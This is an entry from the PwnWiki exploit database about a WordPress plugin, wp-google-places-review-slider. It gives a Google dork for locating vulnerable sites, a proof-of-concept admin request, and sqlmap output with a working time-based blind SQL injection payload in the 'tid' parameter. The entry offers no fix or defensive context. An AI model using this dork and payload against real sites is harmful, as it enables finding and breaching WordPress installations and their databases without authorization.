免费、自由、人人可编辑的漏洞库--pwnwiki.com
,
Google Dork
inurl:"/wp-content/plugins/wp-google-places-review-slider/"
POC
GET/wp-admin/admin.php?page=wp_google-templates_posts&tid=1&_wpnonce=*** &taction=edit HTTP/1.1
SQLMAP
sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests: --- Parameter: tid (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=wp_google-templates_posts&tid=1 AND (SELECT 5357 FROM (SELECT(SLEEP(5)))kHQz)&_wpnonce=***&taction=edit
免费、自由、人人(PwnWiki.Com)可编辑的漏洞库